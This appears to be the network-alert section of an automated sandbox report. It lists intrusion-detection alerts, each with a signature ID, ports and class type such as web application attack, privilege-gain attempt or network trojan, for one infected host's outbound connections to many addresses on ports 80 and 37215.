              Classtype:Web Application Attack
              Timestamp:192.168.2.2368.233.96.13258694802030092 01/02/24-06:25:19.392967
              SID:2030092
              Source Port:58694
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23176.119.158.21950988802030092 01/02/24-06:24:35.189037
              SID:2030092
              Source Port:50988
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2391.146.142.15155428802025883 01/02/24-06:24:27.710944
              SID:2025883
              Source Port:55428
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23116.202.207.17543532802030092 01/02/24-06:24:40.704654
              SID:2030092
              Source Port:43532
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2341.47.14.14559648802025883 01/02/24-06:24:55.990421
              SID:2025883
              Source Port:59648
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.47.19.11445826802025883 01/02/24-06:23:56.133253
              SID:2025883
              Source Port:45826
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2351.210.89.5356836802030092 01/02/24-06:25:38.038524
              SID:2030092
              Source Port:56836
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23116.203.70.2860376802030092 01/02/24-06:23:52.035635
              SID:2030092
              Source Port:60376
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23198.204.78.11558122802030092 01/02/24-06:24:30.686985
              SID:2030092
              Source Port:58122
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23119.77.165.6058400802030092 01/02/24-06:23:55.158684
              SID:2030092
              Source Port:58400
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.63.254.14947840802030092 01/02/24-06:25:42.582550
              SID:2030092
              Source Port:47840
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.82.158.9850494802030092 01/02/24-06:24:08.856573
              SID:2030092
              Source Port:50494
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2343.192.122.6537722802030092 01/02/24-06:25:42.403229
              SID:2030092
              Source Port:37722
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2320.94.161.14533044802030092 01/02/24-06:24:17.563871
              SID:2030092
              Source Port:33044
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2347.95.228.7335778802025883 01/02/24-06:24:59.105890
              SID:2025883
              Source Port:35778
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.235.217.184.7845324802030092 01/02/24-06:25:15.076575
              SID:2030092
              Source Port:45324
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.254.98.9037532372152835222 01/02/24-06:23:56.031360
              SID:2835222
              Source Port:37532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2320.65.30.21242196802030092 01/02/24-06:25:03.828276
              SID:2030092
              Source Port:42196
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.121.24.21239268802025883 01/02/24-06:25:34.772506
              SID:2025883
              Source Port:39268
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23200.159.177.3149306802030092 01/02/24-06:24:11.224156
              SID:2030092
              Source Port:49306
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2366.78.59.10240712802030092 01/02/24-06:25:15.619279
              SID:2030092
              Source Port:40712
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23178.128.227.10941330802025883 01/02/24-06:25:25.911068
              SID:2025883
              Source Port:41330
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23197.26.123.21538682802025883 01/02/24-06:25:36.163559
              SID:2025883
              Source Port:38682
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23160.242.101.24957992802025883 01/02/24-06:24:49.569096
              SID:2025883
              Source Port:57992
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.23.98.20438590802025883 01/02/24-06:24:01.079300
              SID:2025883
              Source Port:38590
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.3.104.6048300802025883 01/02/24-06:25:07.011141
              SID:2025883
              Source Port:48300
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23184.27.51.3257188802025883 01/02/24-06:25:35.366173
              SID:2025883
              Source Port:57188
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2350.199.186.2553794802030092 01/02/24-06:24:08.558341
              SID:2030092
              Source Port:53794
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.76.96.2160320802025883 01/02/24-06:25:15.761034
              SID:2025883
              Source Port:60320
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23162.243.164.3647712802030092 01/02/24-06:25:00.919883
              SID:2030092
              Source Port:47712
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.25.41.24933472802025883 01/02/24-06:24:01.079195
              SID:2025883
              Source Port:33472
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23212.40.8.18758620802025883 01/02/24-06:24:23.995468
              SID:2025883
              Source Port:58620
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.100.195.10552802802030092 01/02/24-06:25:15.214192
              SID:2030092
              Source Port:52802
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23167.82.120.6646464802025883 01/02/24-06:24:27.487383
              SID:2025883
              Source Port:46464
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23190.77.152.21653296802025883 01/02/24-06:25:16.037354
              SID:2025883
              Source Port:53296
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.72.240.21243978802025883 01/02/24-06:24:23.654334
              SID:2025883
              Source Port:43978
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.15.103.2141670802030092 01/02/24-06:25:31.414284
              SID:2030092
              Source Port:41670
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23175.29.154.10159250802030092 01/02/24-06:24:03.503193
              SID:2030092
              Source Port:59250
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2367.207.70.10055198802030092 01/02/24-06:23:52.032969
              SID:2030092
              Source Port:55198
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.181.35.21934232802025883 01/02/24-06:23:57.729740
              SID:2025883
              Source Port:34232
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.215.216.4359224802030092 01/02/24-06:23:50.494104
              SID:2030092
              Source Port:59224
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23173.246.114.1738990802025883 01/02/24-06:24:15.084514
              SID:2025883
              Source Port:38990
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23184.29.129.740722802025883 01/02/24-06:23:49.999892
              SID:2025883
              Source Port:40722
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2394.237.51.5260554802025883 01/02/24-06:24:20.104130
              SID:2025883
              Source Port:60554
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.254.100.15556258372152829579 01/02/24-06:24:45.346010
              SID:2829579
              Source Port:56258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.232.135.71.17637678802025883 01/02/24-06:24:11.112670
              SID:2025883
              Source Port:37678
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2398.4.73.1259564802025883 01/02/24-06:25:01.180668
              SID:2025883
              Source Port:59564
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2368.68.1.22036644802030092 01/02/24-06:25:00.920491
              SID:2030092
              Source Port:36644
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.160.3.14954360802025883 01/02/24-06:24:40.650599
              SID:2025883
              Source Port:54360
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2343.225.210.1847296802030092 01/02/24-06:24:55.316812
              SID:2030092
              Source Port:47296
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.7.184.25344448802030092 01/02/24-06:24:40.620372
              SID:2030092
              Source Port:44448
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.216.168.7659634802025883 01/02/24-06:23:58.312912
              SID:2025883
              Source Port:59634
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2344.237.242.20252038802025883 01/02/24-06:24:36.865314
              SID:2025883
              Source Port:52038
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2331.41.88.1257330802025883 01/02/24-06:24:41.167214
              SID:2025883
              Source Port:57330
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2335.211.249.21148824802025883 01/02/24-06:24:30.918981
              SID:2025883
              Source Port:48824
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23172.67.227.649236802025883 01/02/24-06:24:30.712225
              SID:2025883
              Source Port:49236
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.244.147.18357646802030092 01/02/24-06:24:58.867978
              SID:2030092
              Source Port:57646
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.111.199.19550616802030092 01/02/24-06:24:14.253972
              SID:2030092
              Source Port:50616
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.235.201.189.18145518802025883 01/02/24-06:25:25.755860
              SID:2025883
              Source Port:45518
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.215.63.14354620802025883 01/02/24-06:25:02.012429
              SID:2025883
              Source Port:54620
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.81.147.8654666802030092 01/02/24-06:23:51.956424
              SID:2030092
              Source Port:54666
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.194.49.1647606802025883 01/02/24-06:24:41.187072
              SID:2025883
              Source Port:47606
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23147.161.173.436874802025883 01/02/24-06:24:27.401967
              SID:2025883
              Source Port:36874
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.235.99.3048078372152835222 01/02/24-06:25:03.497384
              SID:2835222
              Source Port:48078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23202.75.28.17559818802030092 01/02/24-06:24:09.284359
              SID:2030092
              Source Port:59818
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.182.204.24235596802030092 01/02/24-06:25:43.130381
              SID:2030092
              Source Port:35596
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.55.87.22949346802030092 01/02/24-06:24:15.126337
              SID:2030092
              Source Port:49346
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23172.121.35.8032926802025883 01/02/24-06:23:50.004340
              SID:2025883
              Source Port:32926
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23103.204.176.20545228802025883 01/02/24-06:24:18.853608
              SID:2025883
              Source Port:45228
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.230.152.22550120802025883 01/02/24-06:24:30.618084
              SID:2025883
              Source Port:50120
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.37.171.10453882802030092 01/02/24-06:24:30.942227
              SID:2030092
              Source Port:53882
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23209.212.159.21533838802030092 01/02/24-06:25:09.542471
              SID:2030092
              Source Port:33838
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23117.52.81.22652076802025883 01/02/24-06:25:30.193653
              SID:2025883
              Source Port:52076
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.200.67.11059548802025883 01/02/24-06:24:19.258178
              SID:2025883
              Source Port:59548
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.44.122.13056304802030092 01/02/24-06:24:35.077411
              SID:2030092
              Source Port:56304
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.250.225.1660966802030092 01/02/24-06:24:43.065656
              SID:2030092
              Source Port:60966
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.176.244.12750336802030092 01/02/24-06:24:45.251137
              SID:2030092
              Source Port:50336
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.107.146.11748156802025883 01/02/24-06:24:01.091302
              SID:2025883
              Source Port:48156
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23200.52.65.8038840802025883 01/02/24-06:25:07.011268
              SID:2025883
              Source Port:38840
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.214.139.1748916802025883 01/02/24-06:24:08.852245
              SID:2025883
              Source Port:48916
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2395.101.194.5540702802025883 01/02/24-06:25:10.079630
              SID:2025883
              Source Port:40702
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23186.39.8.7359120802025883 01/02/24-06:25:19.095834
              SID:2025883
              Source Port:59120
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23194.29.100.3746672802030092 01/02/24-06:24:49.045138
              SID:2030092
              Source Port:46672
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23205.186.128.848982802025883 01/02/24-06:24:27.336199
              SID:2025883
              Source Port:48982
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2377.129.5.23550818802030092 01/02/24-06:25:29.681948
              SID:2030092
              Source Port:50818
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2346.4.186.23653184802025883 01/02/24-06:24:54.906257
              SID:2025883
              Source Port:53184
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23197.15.56.18050906802025883 01/02/24-06:24:01.084128
              SID:2025883
              Source Port:50906
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23206.238.103.10546650802030092 01/02/24-06:24:08.700707
              SID:2030092
              Source Port:46650
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23115.110.175.3654248802030092 01/02/24-06:25:42.911184
              SID:2030092
              Source Port:54248
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2343.175.236.10258804802030092 01/02/24-06:25:44.028517
              SID:2030092
              Source Port:58804
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2387.123.31.16541088802025883 01/02/24-06:24:24.186617
              SID:2025883
              Source Port:41088
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23129.21.35.14555408802030092 01/02/24-06:24:59.028627
              SID:2030092
              Source Port:55408
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.252.147.12855178802025883 01/02/24-06:25:35.867202
              SID:2025883
              Source Port:55178
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.231.214.84.941418802030092 01/02/24-06:25:32.217582
              SID:2030092
              Source Port:41418
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2345.11.236.14242078802030092 01/02/24-06:24:59.115435
              SID:2030092
              Source Port:42078
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.146.189.2848810802030092 01/02/24-06:25:38.026986
              SID:2030092
              Source Port:48810
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.66.124.19643216802030092 01/02/24-06:24:31.144023
              SID:2030092
              Source Port:43216
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2390.186.147.7442050802025883 01/02/24-06:24:54.920917
              SID:2025883
              Source Port:42050
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.27.61.23650004802025883 01/02/24-06:24:48.847612
              SID:2025883
              Source Port:50004
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2343.225.210.1847310802025883 01/02/24-06:24:55.583858
              SID:2025883
              Source Port:47310
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.235.102.23453884372152829579 01/02/24-06:24:34.990700
              SID:2829579
              Source Port:53884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23198.44.248.10442602802025883 01/02/24-06:24:27.798165
              SID:2025883
              Source Port:42602
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2377.74.207.20352380802030092 01/02/24-06:25:35.073405
              SID:2030092
              Source Port:52380
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.250.65.9258572802025883 01/02/24-06:25:21.541317
              SID:2025883
              Source Port:58572
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23130.211.15.9540968802025883 01/02/24-06:23:49.492483
              SID:2025883
              Source Port:40968
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.232.182.153.6248988802025883 01/02/24-06:24:24.372962
              SID:2025883
              Source Port:48988
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.232.189.137.1749444802025883 01/02/24-06:25:04.484177
              SID:2025883
              Source Port:49444
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2335.211.213.10757532802030092 01/02/24-06:25:37.947175
              SID:2030092
              Source Port:57532
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23198.12.222.11345034802030092 01/02/24-06:24:58.944478
              SID:2030092
              Source Port:45034
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2389.218.57.12838636802030092 01/02/24-06:23:50.310617
              SID:2030092
              Source Port:38636
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23218.35.171.23047210802025883 01/02/24-06:24:23.810086
              SID:2025883
              Source Port:47210
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.12.99.17136038802030092 01/02/24-06:24:09.103574
              SID:2030092
              Source Port:36038
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.214.78.16148682802030092 01/02/24-06:24:56.009741
              SID:2030092
              Source Port:48682
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.207.79.24432972802025883 01/02/24-06:24:45.082176
              SID:2025883
              Source Port:32972
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.181.35.21934120802030092 01/02/24-06:23:54.670611
              SID:2030092
              Source Port:34120
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23103.204.176.20545228802030092 01/02/24-06:24:18.853608
              SID:2030092
              Source Port:45228
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.223.119.15053212802025883 01/02/24-06:25:25.284668
              SID:2025883
              Source Port:53212
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23109.168.109.22945120802030092 01/02/24-06:23:56.151964
              SID:2030092
              Source Port:45120
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2344.215.139.22838962802025883 01/02/24-06:25:42.024128
              SID:2025883
              Source Port:38962
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2364.120.69.4946098802025883 01/02/24-06:24:49.087899
              SID:2025883
              Source Port:46098
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23209.212.159.21533838802025883 01/02/24-06:25:09.542471
              SID:2025883
              Source Port:33838
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23149.57.79.10232814802025883 01/02/24-06:23:51.958904
              SID:2025883
              Source Port:32814
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23170.130.22.25444286802030092 01/02/24-06:24:08.505355
              SID:2030092
              Source Port:44286
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.244.131.839990802030092 01/02/24-06:25:34.794177
              SID:2030092
              Source Port:39990
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.55.173.24453040802025883 01/02/24-06:23:51.512013
              SID:2025883
              Source Port:53040
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23208.70.77.18137854802030092 01/02/24-06:24:43.121132
              SID:2030092
              Source Port:37854
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2342.237.113.22243184802030092 01/02/24-06:24:52.311736
              SID:2030092
              Source Port:43184
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.114.164.4947672802025883 01/02/24-06:25:25.169174
              SID:2025883
              Source Port:47672
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.169.136.260250802025883 01/02/24-06:24:37.969433
              SID:2025883
              Source Port:60250
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.235.133.222.13648094802030092 01/02/24-06:23:51.610663
              SID:2030092
              Source Port:48094
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2399.79.174.3141104802025883 01/02/24-06:25:34.689900
              SID:2025883
              Source Port:41104
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23138.118.173.13258566802030092 01/02/24-06:24:33.144309
              SID:2030092
              Source Port:58566
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.16.231.22546374802030092 01/02/24-06:24:45.225996
              SID:2030092
              Source Port:46374
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.223.106.9147644802025883 01/02/24-06:24:04.156293
              SID:2025883
              Source Port:47644
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.70.223.6440344802025883 01/02/24-06:24:31.051081
              SID:2025883
              Source Port:40344
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.7.184.25344448802025883 01/02/24-06:24:40.620372
              SID:2025883
              Source Port:44448
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.43.229.22859784802030092 01/02/24-06:23:58.287305
              SID:2030092
              Source Port:59784
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23193.233.164.23748736802030092 01/02/24-06:24:17.936241
              SID:2030092
              Source Port:48736
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23175.29.154.10159250802025883 01/02/24-06:24:03.503193
              SID:2025883
              Source Port:59250
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.161.154.7646938802030092 01/02/24-06:24:40.755405
              SID:2030092
              Source Port:46938
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.24.144.16546790802030092 01/02/24-06:25:42.725214
              SID:2030092
              Source Port:46790
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23220.134.75.18260554802030092 01/02/24-06:25:32.202180
              SID:2030092
              Source Port:60554
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23192.126.242.16243294802030092 01/02/24-06:25:09.578837
              SID:2030092
              Source Port:43294
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2398.4.73.1259564802030092 01/02/24-06:25:01.180668
              SID:2030092
              Source Port:59564
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.167.130.6444126802025883 01/02/24-06:24:24.131709
              SID:2025883
              Source Port:44126
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.208.198.21441798802025883 01/02/24-06:24:45.035888
              SID:2025883
              Source Port:41798
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23106.15.76.4851782802030092 01/02/24-06:24:31.040036
              SID:2030092
              Source Port:51782
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.254.208.1058096802025883 01/02/24-06:24:13.764312
              SID:2025883
              Source Port:58096
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2396.67.179.140870802025883 01/02/24-06:24:10.828261
              SID:2025883
              Source Port:40870
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2335.231.230.6033018802025883 01/02/24-06:25:03.820714
              SID:2025883
              Source Port:33018
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23210.136.185.6435820802030092 01/02/24-06:25:42.761377
              SID:2030092
              Source Port:35820
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23201.229.167.15941366802030092 01/02/24-06:24:19.178132
              SID:2030092
              Source Port:41366
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23142.58.163.9638386802030092 01/02/24-06:23:55.563204
              SID:2030092
              Source Port:38386
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23217.23.144.15954616802030092 01/02/24-06:25:02.033209
              SID:2030092
              Source Port:54616
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.235.63.152.5938096802025883 01/02/24-06:24:37.257342
              SID:2025883
              Source Port:38096
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2349.233.248.20255454802030092 01/02/24-06:25:29.740902
              SID:2030092
              Source Port:55454
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
